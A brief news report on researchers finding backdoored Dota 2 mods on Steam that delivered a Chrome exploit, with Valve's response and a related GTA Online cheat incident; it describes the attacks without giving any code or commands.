Security researchers have uncovered four malicious modifications for the popular Dota 2 multiplayer online battle arena video game that were created by a malicious actor and uploaded to the Steam store. Jan Vojtěšek, a malware researcher at Avast Threat Labs, identified the game mods as Overdog no annoying heroes, Custom Hero Brawl, and Overthrow RTZ Edition X10 XP. The mods contained a snippet of Lua code that could be used to log, execute arbitrary system commands, create coroutines, and make HTTP GET requests. The malicious code was difficult to detect, as it was hidden in the twenty lines of code included with the three newer game mods. This backdoor enabled the attacker to remotely execute commands on the infected devices, potentially allowing them to install further malware. It also allowed the execution of any JavaScript acquired through HTTP, giving the attacker the ability to modify the exploit code without going through the game mode verification process. On the compromised systems, the backdoor was used to download a Chrome exploit known as CVE-2021-38003, which was exploited in the wild as a zero-day and patched in October 2021. Avast reported their findings to Valve, the developer of Dota 2, who updated the vulnerable V8 version on January 12, 2023 and removed the malicious game mods. According to Valve, fewer than 200 players were affected by the attack. In a similar incident, a Grand Theft Auto Online remote code execution vulnerability was exploited by the developer of the North GTA cheat to include features to ban and corrupt players accounts in a version released on January 20, 2023. The cheat dev removed the features in a new version on January 21 and apologized for the chaos caused by the cheats users. Rockstar Games, the developer of GTA, released a security update to address the Grand Theft Auto Online issue on February 2.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Wed, 08 Feb 2023 19:58:02 +0000